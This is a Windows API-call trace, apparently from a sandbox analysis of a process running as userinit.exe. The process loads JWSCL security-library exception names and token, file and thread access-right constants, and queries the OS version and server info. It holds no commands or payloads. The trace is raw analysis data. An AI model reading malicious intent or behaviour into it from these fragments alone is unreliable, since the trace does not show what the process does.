[0180.493] SysReAllocStringLen (in: pbstr=0x28bf180*=0x0, psz="EJwsclReadOnlyPropertyException", len=0x1f | out: pbstr=0x28bf180*="EJwsclReadOnlyPropertyException") returned 1
[0180.493] SysReAllocStringLen (in: pbstr=0x28bf168*=0x0, psz="EJwsclDuplicateListEntryException", len=0x21 | out: pbstr=0x28bf168*="EJwsclDuplicateListEntryException") returned 1
[0180.493] SysReAllocStringLen (in: pbstr=0x28bf150*=0x0, psz="EJwsclIndexOutOfBoundsException", len=0x1f | out: pbstr=0x28bf150*="EJwsclIndexOutOfBoundsException") returned 1
[0180.493] SysReAllocStringLen (in: pbstr=0x28bf138*=0x0, psz="EJwsclInvalidSidAuthorityValue", len=0x1e | out: pbstr=0x28bf138*="EJwsclInvalidSidAuthorityValue") returned 1
[0180.493] SysReAllocStringLen (in: pbstr=0x28bf120*=0x0, psz="EJwsclInvalidKnownSIDException", len=0x1e | out: pbstr=0x28bf120*="EJwsclInvalidKnownSIDException") returned 1
[0180.493] SysReAllocStringLen (in: pbstr=0x28bf108*=0x0, psz="EJwsclInvalidComputer", len=0x15 | out: pbstr=0x28bf108*="EJwsclInvalidComputer") returned 1
[0180.493] SysReAllocStringLen (in: pbstr=0x28bf0f0*=0x0, psz="EJwsclInvalidGroupSIDException", len=0x1e | out: pbstr=0x28bf0f0*="EJwsclInvalidGroupSIDException") returned 1
[0180.494] SysReAllocStringLen (in: pbstr=0x28bf0d8*=0x0, psz="EJwsclInvalidOwnerSIDException", len=0x1e | out: pbstr=0x28bf0d8*="EJwsclInvalidOwnerSIDException") returned 1
[0180.494] SysReAllocStringLen (in: pbstr=0x28bf0c0*=0x0, psz="EJwsclInvalidSIDException", len=0x19 | out: pbstr=0x28bf0c0*="EJwsclInvalidSIDException") returned 1
[0180.494] SysReAllocStringLen (in: pbstr=0x28bf0a8*=0x0, psz="EJwsclInvalidSecurityListException", len=0x22 | out: pbstr=0x28bf0a8*="EJwsclInvalidSecurityListException") returned 1
[0180.494] SysReAllocStringLen (in: pbstr=0x28bf090*=0x0, psz="EJwsclInvalidMandatoryLevelException", len=0x24 | out: pbstr=0x28bf090*="EJwsclInvalidMandatoryLevelException") returned 1
[0180.494] SysReAllocStringLen (in: pbstr=0x28bf078*=0x0, psz="EJwsclEmptyACLException", len=0x17 | out: pbstr=0x28bf078*="EJwsclEmptyACLException") returned 1
[0180.494] SysReAllocStringLen (in: pbstr=0x28bf060*=0x0, psz="EJwsclNILParameterException", len=0x1b | out: pbstr=0x28bf060*="EJwsclNILParameterException") returned 1
[0180.494] SysReAllocStringLen (in: pbstr=0x28bf048*=0x0, psz="EJwsclInheritanceSourceNotSupportedException", len=0x2c | out: pbstr=0x28bf048*="EJwsclInheritanceSourceNotSupportedException") returned 1
[0180.494] SysReAllocStringLen (in: pbstr=0x28bf030*=0x0, psz="EJwsclInvalidObjectArrayException", len=0x21 | out: pbstr=0x28bf030*="EJwsclInvalidObjectArrayException") returned 1
[0180.494] SysReAllocStringLen (in: pbstr=0x28bf018*=0x0, psz="EJwsclProcessIdNotAvailable", len=0x1b | out: pbstr=0x28bf018*="EJwsclProcessIdNotAvailable") returned 1
[0180.494] SysReAllocStringLen (in: pbstr=0x28bf000*=0x0, psz="EJwsclWinCallFailedException", len=0x1c | out: pbstr=0x28bf000*="EJwsclWinCallFailedException") returned 1
[0180.494] SysReAllocStringLen (in: pbstr=0x28befe8*=0x0, psz="EJwsclUnsupportedWindowsVersionException", len=0x28 | out: pbstr=0x28befe8*="EJwsclUnsupportedWindowsVersionException") returned 1
[0180.494] SysReAllocStringLen (in: pbstr=0x28befd0*=0x0, psz="EJwsclNotImplementedException", len=0x1d | out: pbstr=0x28befd0*="EJwsclNotImplementedException") returned 1
[0180.494] SysReAllocStringLen (in: pbstr=0x28befb8*=0x0, psz="EJwsclAccessTypeException", len=0x19 | out: pbstr=0x28befb8*="EJwsclAccessTypeException") returned 1
[0180.494] SysReAllocStringLen (in: pbstr=0x28befa0*=0x0, psz="EJwsclAdjustPrivilegeException", len=0x1e | out: pbstr=0x28befa0*="EJwsclAdjustPrivilegeException") returned 1
[0180.494] SysReAllocStringLen (in: pbstr=0x28bef88*=0x0, psz="EJwsclPrivilegeCheckException", len=0x1d | out: pbstr=0x28bef88*="EJwsclPrivilegeCheckException") returned 1
[0180.494] SysReAllocStringLen (in: pbstr=0x28bef70*=0x0, psz="EJwsclPrivilegeNotFoundException", len=0x20 | out: pbstr=0x28bef70*="EJwsclPrivilegeNotFoundException") returned 1
[0180.494] SysReAllocStringLen (in: pbstr=0x28bef58*=0x0, psz="EJwsclInvalidIndexPrivilegeException", len=0x24 | out: pbstr=0x28bef58*="EJwsclInvalidIndexPrivilegeException") returned 1
[0180.494] SysReAllocStringLen (in: pbstr=0x28bef40*=0x0, psz="EJwsclPrivilegeException", len=0x18 | out: pbstr=0x28bef40*="EJwsclPrivilegeException") returned 1
[0180.494] SysReAllocStringLen (in: pbstr=0x28bef28*=0x0, psz="EJwsclNotEnoughMemory", len=0x15 | out: pbstr=0x28bef28*="EJwsclNotEnoughMemory") returned 1
[0180.494] SysReAllocStringLen (in: pbstr=0x28bef10*=0x0, psz="EJwsclInvalidTokenHandle", len=0x18 | out: pbstr=0x28bef10*="EJwsclInvalidTokenHandle") returned 1
[0180.494] SysReAllocStringLen (in: pbstr=0x28beef8*=0x0, psz="EJwsclNoThreadTokenAvailable", len=0x1c | out: pbstr=0x28beef8*="EJwsclNoThreadTokenAvailable") returned 1
[0180.494] SysReAllocStringLen (in: pbstr=0x28beee0*=0x0, psz="EJwsclDuplicateTokenException", len=0x1d | out: pbstr=0x28beee0*="EJwsclDuplicateTokenException") returned 1
[0180.494] SysReAllocStringLen (in: pbstr=0x28beec8*=0x0, psz="EJwsclInvalidOwnerException", len=0x1b | out: pbstr=0x28beec8*="EJwsclInvalidOwnerException") returned 1
[0180.494] SysReAllocStringLen (in: pbstr=0x28beeb0*=0x0, psz="EJwsclInvalidPrimaryToken", len=0x19 | out: pbstr=0x28beeb0*="EJwsclInvalidPrimaryToken") returned 1
[0180.494] SysReAllocStringLen (in: pbstr=0x28bee98*=0x0, psz="EJwsclTokenPrimaryException", len=0x1b | out: pbstr=0x28bee98*="EJwsclTokenPrimaryException") returned 1
[0180.494] SysReAllocStringLen (in: pbstr=0x28bee80*=0x0, psz="EJwsclTokenImpersonationException", len=0x21 | out: pbstr=0x28bee80*="EJwsclTokenImpersonationException") returned 1
[0180.494] SysReAllocStringLen (in: pbstr=0x28bee68*=0x0, psz="EJwsclTokenInformationException", len=0x1f | out: pbstr=0x28bee68*="EJwsclTokenInformationException") returned 1
[0180.494] SysReAllocStringLen (in: pbstr=0x28bee50*=0x0, psz="EJwsclSharedTokenException", len=0x1a | out: pbstr=0x28bee50*="EJwsclSharedTokenException") returned 1
[0180.494] SysReAllocStringLen (in: pbstr=0x28bee38*=0x0, psz="EJwsclOpenProcessTokenException", len=0x1f | out: pbstr=0x28bee38*="EJwsclOpenProcessTokenException") returned 1
[0180.494] SysReAllocStringLen (in: pbstr=0x28bee20*=0x0, psz="EJwsclOpenThreadTokenException", len=0x1e | out: pbstr=0x28bee20*="EJwsclOpenThreadTokenException") returned 1
[0180.494] SysReAllocStringLen (in: pbstr=0x28bee08*=0x0, psz="EJwsclSecurityException", len=0x17 | out: pbstr=0x28bee08*="EJwsclSecurityException") returned 1
[0180.495] SysReAllocStringLen (in: pbstr=0x28bedf0*=0x0, psz="Exception", len=0x9 | out: pbstr=0x28bedf0*="Exception") returned 1
[0180.495] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0180.495] GetProcAddress (hModule=0x75370000, lpProcName="GetVersionExA") returned 0x753c3861
[0180.495] GetVersionExA (in: lpVersionInformation=0x6f854*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x76a6ea43, dwMinorVersion=0x1e0000, dwBuildNumber=0x0, dwPlatformId=0x10, szCSDVersion="|ø\x06") | out: lpVersionInformation=0x6f854*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0180.495] GetModuleHandleA (lpModuleName="netapi32.dll") returned 0x0
[0180.495] LoadLibraryA (lpLibFileName="netapi32.dll") returned 0x73b10000
[0180.501] GetProcAddress (hModule=0x73b10000, lpProcName="NetServerGetInfo") returned 0x74f13cfa
[0180.501] NetServerGetInfo (in: servername="", level=0x65, bufptr=0x6f8d8 | out: bufptr=0x6f8d8) returned 0x0
[0180.505] GetModuleHandleA (lpModuleName="netapi32.dll") returned 0x73b10000
[0180.505] GetProcAddress (hModule=0x73b10000, lpProcName="NetApiBufferFree") returned 0x73b013d2
[0180.505] NetApiBufferFree (Buffer=0x201d00) returned 0x0
[0180.506] SetErrorMode (uMode=0x8000) returned 0x1
[0180.506] LoadLibraryA (lpLibFileName="OLEAUT32.DLL") returned 0x758f0000
[0180.506] SetErrorMode (uMode=0x1) returned 0x8000
[0180.506] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0180.507] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0180.509] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0180.511] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0180.512] SysReAllocStringLen (in: pbstr=0x28bec40*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x28bec40*="DELETE") returned 1
[0180.512] SysReAllocStringLen (in: pbstr=0x28bec30*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x28bec30*="READ_CONTROL") returned 1
[0180.512] SysReAllocStringLen (in: pbstr=0x28bec20*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x28bec20*="WRITE_OWNER") returned 1
[0180.512] SysReAllocStringLen (in: pbstr=0x28bec10*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x28bec10*="WRITE_DAC") returned 1
[0180.512] SysReAllocStringLen (in: pbstr=0x28bec00*=0x0, psz="FILE_WRITE_ATTRIBUTES", len=0x15 | out: pbstr=0x28bec00*="FILE_WRITE_ATTRIBUTES") returned 1
[0180.512] SysReAllocStringLen (in: pbstr=0x28bebf0*=0x0, psz="FILE_READ_ATTRIBUTES", len=0x14 | out: pbstr=0x28bebf0*="FILE_READ_ATTRIBUTES") returned 1
[0180.512] SysReAllocStringLen (in: pbstr=0x28bebe0*=0x0, psz="FILE_CREATE_PIPE_INSTANCE", len=0x19 | out: pbstr=0x28bebe0*="FILE_CREATE_PIPE_INSTANCE") returned 1
[0180.512] SysReAllocStringLen (in: pbstr=0x28bebd0*=0x0, psz="FILE_WRITE_DATA", len=0xf | out: pbstr=0x28bebd0*="FILE_WRITE_DATA") returned 1
[0180.512] SysReAllocStringLen (in: pbstr=0x28bebc0*=0x0, psz="FILE_READ_DATA", len=0xe | out: pbstr=0x28bebc0*="FILE_READ_DATA") returned 1
[0180.512] SysReAllocStringLen (in: pbstr=0x28bebb0*=0x0, psz="FILE_ALL_ACCESS", len=0xf | out: pbstr=0x28bebb0*="FILE_ALL_ACCESS") returned 1
[0180.512] SysReAllocStringLen (in: pbstr=0x28beba0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x28beba0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0180.512] SysReAllocStringLen (in: pbstr=0x28beb90*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x28beb90*="STANDARD_RIGHTS_WRITE") returned 1
[0180.512] SysReAllocStringLen (in: pbstr=0x28beb80*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x28beb80*="STANDARD_RIGHTS_READ") returned 1
[0180.512] SysReAllocStringLen (in: pbstr=0x28beb70*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x28beb70*="STANDARD_RIGHTS_ALL") returned 1
[0180.512] SysReAllocStringLen (in: pbstr=0x28beb50*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x28beb50*="DELETE") returned 1
[0180.512] SysReAllocStringLen (in: pbstr=0x28beb40*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x28beb40*="READ_CONTROL") returned 1
[0180.512] SysReAllocStringLen (in: pbstr=0x28beb30*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x28beb30*="WRITE_OWNER") returned 1
[0180.512] SysReAllocStringLen (in: pbstr=0x28beb20*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x28beb20*="WRITE_DAC") returned 1
[0180.512] SysReAllocStringLen (in: pbstr=0x28beb10*=0x0, psz="TOKEN_ADJUST_SESSIONID", len=0x16 | out: pbstr=0x28beb10*="TOKEN_ADJUST_SESSIONID") returned 1
[0180.512] SysReAllocStringLen (in: pbstr=0x28beb00*=0x0, psz="TOKEN_ADJUST_DEFAULT", len=0x14 | out: pbstr=0x28beb00*="TOKEN_ADJUST_DEFAULT") returned 1
[0180.512] SysReAllocStringLen (in: pbstr=0x28beaf0*=0x0, psz="TOKEN_ADJUST_GROUPS", len=0x13 | out: pbstr=0x28beaf0*="TOKEN_ADJUST_GROUPS") returned 1
[0180.512] SysReAllocStringLen (in: pbstr=0x28beae0*=0x0, psz="TOKEN_ADJUST_PRIVILEGES", len=0x17 | out: pbstr=0x28beae0*="TOKEN_ADJUST_PRIVILEGES") returned 1
[0180.512] SysReAllocStringLen (in: pbstr=0x28bead0*=0x0, psz="TOKEN_QUERY_SOURCE", len=0x12 | out: pbstr=0x28bead0*="TOKEN_QUERY_SOURCE") returned 1
[0180.513] SysReAllocStringLen (in: pbstr=0x28beac0*=0x0, psz="TOKEN_QUERY", len=0xb | out: pbstr=0x28beac0*="TOKEN_QUERY") returned 1
[0180.513] SysReAllocStringLen (in: pbstr=0x28beab0*=0x0, psz="TOKEN_IMPERSONATE", len=0x11 | out: pbstr=0x28beab0*="TOKEN_IMPERSONATE") returned 1
[0180.513] SysReAllocStringLen (in: pbstr=0x28beaa0*=0x0, psz="TOKEN_DUPLICATE", len=0xf | out: pbstr=0x28beaa0*="TOKEN_DUPLICATE") returned 1
[0180.513] SysReAllocStringLen (in: pbstr=0x28bea90*=0x0, psz="TOKEN_ASSIGN_PRIMARY", len=0x14 | out: pbstr=0x28bea90*="TOKEN_ASSIGN_PRIMARY") returned 1
[0180.513] SysReAllocStringLen (in: pbstr=0x28bea80*=0x0, psz="TOKEN_ALL_ACCESS", len=0x10 | out: pbstr=0x28bea80*="TOKEN_ALL_ACCESS") returned 1
[0180.513] SysReAllocStringLen (in: pbstr=0x28bea70*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x28bea70*="STANDARD_RIGHTS_EXECUTE") returned 1
[0180.513] SysReAllocStringLen (in: pbstr=0x28bea60*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x28bea60*="STANDARD_RIGHTS_WRITE") returned 1
[0180.513] SysReAllocStringLen (in: pbstr=0x28bea50*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x28bea50*="STANDARD_RIGHTS_READ") returned 1
[0180.513] SysReAllocStringLen (in: pbstr=0x28bea40*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x28bea40*="STANDARD_RIGHTS_ALL") returned 1
[0180.513] SysReAllocStringLen (in: pbstr=0x28bea30*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x28bea30*="DELETE") returned 1
[0180.513] SysReAllocStringLen (in: pbstr=0x28bea20*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x28bea20*="READ_CONTROL") returned 1
[0180.513] SysReAllocStringLen (in: pbstr=0x28bea10*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x28bea10*="WRITE_OWNER") returned 1
[0180.513] SysReAllocStringLen (in: pbstr=0x28bea00*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x28bea00*="WRITE_DAC") returned 1
[0180.513] SysReAllocStringLen (in: pbstr=0x28be9f0*=0x0, psz="TIMER_MODIFY_STATE", len=0x12 | out: pbstr=0x28be9f0*="TIMER_MODIFY_STATE") returned 1
[0180.513] SysReAllocStringLen (in: pbstr=0x28be9e0*=0x0, psz="TIMER_QUERY_STATE", len=0x11 | out: pbstr=0x28be9e0*="TIMER_QUERY_STATE") returned 1
[0180.513] SysReAllocStringLen (in: pbstr=0x28be9d0*=0x0, psz="TIMER_ALL_ACCESS", len=0x10 | out: pbstr=0x28be9d0*="TIMER_ALL_ACCESS") returned 1
[0180.513] SysReAllocStringLen (in: pbstr=0x28be9c0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x28be9c0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0180.513] SysReAllocStringLen (in: pbstr=0x28be9b0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x28be9b0*="STANDARD_RIGHTS_WRITE") returned 1
[0180.513] SysReAllocStringLen (in: pbstr=0x28be9a0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x28be9a0*="STANDARD_RIGHTS_READ") returned 1
[0180.513] SysReAllocStringLen (in: pbstr=0x28be990*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x28be990*="STANDARD_RIGHTS_ALL") returned 1
[0180.513] SysReAllocStringLen (in: pbstr=0x28be980*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x28be980*="DELETE") returned 1
[0180.513] SysReAllocStringLen (in: pbstr=0x28be970*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x28be970*="READ_CONTROL") returned 1
[0180.513] SysReAllocStringLen (in: pbstr=0x28be960*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x28be960*="WRITE_OWNER") returned 1
[0180.513] SysReAllocStringLen (in: pbstr=0x28be950*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x28be950*="WRITE_DAC") returned 1
[0180.513] SysReAllocStringLen (in: pbstr=0x28be940*=0x0, psz="SECTION_EXTEND_SIZE", len=0x13 | out: pbstr=0x28be940*="SECTION_EXTEND_SIZE") returned 1
[0180.513] SysReAllocStringLen (in: pbstr=0x28be930*=0x0, psz="FILE_MAP_READ", len=0xd | out: pbstr=0x28be930*="FILE_MAP_READ") returned 1
[0180.513] SysReAllocStringLen (in: pbstr=0x28be920*=0x0, psz="FILE_MAP_WRITE", len=0xe | out: pbstr=0x28be920*="FILE_MAP_WRITE") returned 1
[0180.513] SysReAllocStringLen (in: pbstr=0x28be910*=0x0, psz="FILE_MAP_COPY", len=0xd | out: pbstr=0x28be910*="FILE_MAP_COPY") returned 1
[0180.513] SysReAllocStringLen (in: pbstr=0x28be900*=0x0, psz="FILE_MAP_ALL_ACCESS", len=0x13 | out: pbstr=0x28be900*="FILE_MAP_ALL_ACCESS") returned 1
[0180.513] SysReAllocStringLen (in: pbstr=0x28be8f0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x28be8f0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0180.513] SysReAllocStringLen (in: pbstr=0x28be8e0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x28be8e0*="STANDARD_RIGHTS_WRITE") returned 1
[0180.513] SysReAllocStringLen (in: pbstr=0x28be8d0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x28be8d0*="STANDARD_RIGHTS_READ") returned 1
[0180.514] SysReAllocStringLen (in: pbstr=0x28be8c0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x28be8c0*="STANDARD_RIGHTS_ALL") returned 1
[0180.514] SysReAllocStringLen (in: pbstr=0x28be8b0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x28be8b0*="DELETE") returned 1
[0180.514] SysReAllocStringLen (in: pbstr=0x28be8a0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x28be8a0*="READ_CONTROL") returned 1
[0180.514] SysReAllocStringLen (in: pbstr=0x28be890*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x28be890*="WRITE_OWNER") returned 1
[0180.514] SysReAllocStringLen (in: pbstr=0x28be880*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x28be880*="WRITE_DAC") returned 1
[0180.514] SysReAllocStringLen (in: pbstr=0x28be870*=0x0, psz="MUTEX_MODIFY_STATE", len=0x12 | out: pbstr=0x28be870*="MUTEX_MODIFY_STATE") returned 1
[0180.514] SysReAllocStringLen (in: pbstr=0x28be860*=0x0, psz="MUTEX_ALL_ACCESS", len=0x10 | out: pbstr=0x28be860*="MUTEX_ALL_ACCESS") returned 1
[0180.514] SysReAllocStringLen (in: pbstr=0x28be850*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x28be850*="STANDARD_RIGHTS_EXECUTE") returned 1
[0180.514] SysReAllocStringLen (in: pbstr=0x28be840*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x28be840*="STANDARD_RIGHTS_WRITE") returned 1
[0180.514] SysReAllocStringLen (in: pbstr=0x28be830*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x28be830*="STANDARD_RIGHTS_READ") returned 1
[0180.514] SysReAllocStringLen (in: pbstr=0x28be820*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x28be820*="STANDARD_RIGHTS_ALL") returned 1
[0180.514] SysReAllocStringLen (in: pbstr=0x28be810*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x28be810*="DELETE") returned 1
[0180.514] SysReAllocStringLen (in: pbstr=0x28be800*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x28be800*="READ_CONTROL") returned 1
[0180.514] SysReAllocStringLen (in: pbstr=0x28be7f0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x28be7f0*="WRITE_OWNER") returned 1
[0180.514] SysReAllocStringLen (in: pbstr=0x28be7e0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x28be7e0*="WRITE_DAC") returned 1
[0180.514] SysReAllocStringLen (in: pbstr=0x28be7d0*=0x0, psz="EVENT_MODIFY_STATE", len=0x12 | out: pbstr=0x28be7d0*="EVENT_MODIFY_STATE") returned 1
[0180.514] SysReAllocStringLen (in: pbstr=0x28be7c0*=0x0, psz="EVENT_ALL_ACCESS", len=0x10 | out: pbstr=0x28be7c0*="EVENT_ALL_ACCESS") returned 1
[0180.514] SysReAllocStringLen (in: pbstr=0x28be7b0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x28be7b0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0180.514] SysReAllocStringLen (in: pbstr=0x28be7a0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x28be7a0*="STANDARD_RIGHTS_WRITE") returned 1
[0180.514] SysReAllocStringLen (in: pbstr=0x28be790*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x28be790*="STANDARD_RIGHTS_READ") returned 1
[0180.514] SysReAllocStringLen (in: pbstr=0x28be780*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x28be780*="STANDARD_RIGHTS_ALL") returned 1
[0180.514] SysReAllocStringLen (in: pbstr=0x28be770*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x28be770*="DELETE") returned 1
[0180.514] SysReAllocStringLen (in: pbstr=0x28be760*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x28be760*="READ_CONTROL") returned 1
[0180.514] SysReAllocStringLen (in: pbstr=0x28be750*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x28be750*="WRITE_OWNER") returned 1
[0180.514] SysReAllocStringLen (in: pbstr=0x28be740*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x28be740*="WRITE_DAC") returned 1
[0180.514] SysReAllocStringLen (in: pbstr=0x28be730*=0x0, psz="SEMAPHORE_MODIFY_STATE", len=0x16 | out: pbstr=0x28be730*="SEMAPHORE_MODIFY_STATE") returned 1
[0180.514] SysReAllocStringLen (in: pbstr=0x28be720*=0x0, psz="SEMAPHORE_ALL_ACCESS", len=0x14 | out: pbstr=0x28be720*="SEMAPHORE_ALL_ACCESS") returned 1
[0180.514] SysReAllocStringLen (in: pbstr=0x28be710*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x28be710*="STANDARD_RIGHTS_EXECUTE") returned 1
[0180.514] SysReAllocStringLen (in: pbstr=0x28be700*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x28be700*="STANDARD_RIGHTS_WRITE") returned 1
[0180.514] SysReAllocStringLen (in: pbstr=0x28be6f0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x28be6f0*="STANDARD_RIGHTS_READ") returned 1
[0180.514] SysReAllocStringLen (in: pbstr=0x28be6e0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x28be6e0*="STANDARD_RIGHTS_ALL") returned 1
[0180.514] SysReAllocStringLen (in: pbstr=0x28be6d0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x28be6d0*="DELETE") returned 1
[0180.515] SysReAllocStringLen (in: pbstr=0x28be6c0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x28be6c0*="READ_CONTROL") returned 1
[0180.515] SysReAllocStringLen (in: pbstr=0x28be6b0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x28be6b0*="WRITE_OWNER") returned 1
[0180.515] SysReAllocStringLen (in: pbstr=0x28be6a0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x28be6a0*="WRITE_DAC") returned 1
[0180.515] SysReAllocStringLen (in: pbstr=0x28be690*=0x0, psz="JOB_OBJECT_SET_SECURITY_ATTRIBUTES", len=0x22 | out: pbstr=0x28be690*="JOB_OBJECT_SET_SECURITY_ATTRIBUTES") returned 1
[0180.515] SysReAllocStringLen (in: pbstr=0x28be680*=0x0, psz="JOB_OBJECT_TERMINATE", len=0x14 | out: pbstr=0x28be680*="JOB_OBJECT_TERMINATE") returned 1
[0180.515] SysReAllocStringLen (in: pbstr=0x28be670*=0x0, psz="JOB_OBJECT_QUERY", len=0x10 | out: pbstr=0x28be670*="JOB_OBJECT_QUERY") returned 1
[0180.515] SysReAllocStringLen (in: pbstr=0x28be660*=0x0, psz="JOB_OBJECT_SET_ATTRIBUTES", len=0x19 | out: pbstr=0x28be660*="JOB_OBJECT_SET_ATTRIBUTES") returned 1
[0180.515] SysReAllocStringLen (in: pbstr=0x28be650*=0x0, psz="JOB_OBJECT_ASSIGN_PROCESS", len=0x19 | out: pbstr=0x28be650*="JOB_OBJECT_ASSIGN_PROCESS") returned 1
[0180.515] SysReAllocStringLen (in: pbstr=0x28be640*=0x0, psz="JOB_OBJECT_ALL_ACCESS", len=0x15 | out: pbstr=0x28be640*="JOB_OBJECT_ALL_ACCESS") returned 1
[0180.515] SysReAllocStringLen (in: pbstr=0x28be630*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x28be630*="STANDARD_RIGHTS_EXECUTE") returned 1
[0180.515] SysReAllocStringLen (in: pbstr=0x28be620*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x28be620*="STANDARD_RIGHTS_WRITE") returned 1
[0180.515] SysReAllocStringLen (in: pbstr=0x28be610*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x28be610*="STANDARD_RIGHTS_READ") returned 1
[0180.515] SysReAllocStringLen (in: pbstr=0x28be600*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x28be600*="STANDARD_RIGHTS_ALL") returned 1
[0180.515] SysReAllocStringLen (in: pbstr=0x28be5f0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x28be5f0*="DELETE") returned 1
[0180.515] SysReAllocStringLen (in: pbstr=0x28be5e0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x28be5e0*="READ_CONTROL") returned 1
[0180.515] SysReAllocStringLen (in: pbstr=0x28be5d0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x28be5d0*="WRITE_OWNER") returned 1
[0180.515] SysReAllocStringLen (in: pbstr=0x28be5c0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x28be5c0*="WRITE_DAC") returned 1
[0180.515] SysReAllocStringLen (in: pbstr=0x28be5b0*=0x0, psz="THREAD_DIRECT_IMPERSONATION", len=0x1b | out: pbstr=0x28be5b0*="THREAD_DIRECT_IMPERSONATION") returned 1
[0180.515] SysReAllocStringLen (in: pbstr=0x28be5a0*=0x0, psz="THREAD_IMPERSONATE", len=0x12 | out: pbstr=0x28be5a0*="THREAD_IMPERSONATE") returned 1
[0180.515] SysReAllocStringLen (in: pbstr=0x28be590*=0x0, psz="THREAD_SET_THREAD_TOKEN", len=0x17 | out: pbstr=0x28be590*="THREAD_SET_THREAD_TOKEN") returned 1
[0180.515] SysReAllocStringLen (in: pbstr=0x28be580*=0x0, psz="THREAD_QUERY_INFORMATION", len=0x18 | out: pbstr=0x28be580*="THREAD_QUERY_INFORMATION") returned 1
[0180.515] SysReAllocStringLen (in: pbstr=0x28be570*=0x0, psz="THREAD_SET_INFORMATION", len=0x16 | out: pbstr=0x28be570*="THREAD_SET_INFORMATION") returned 1
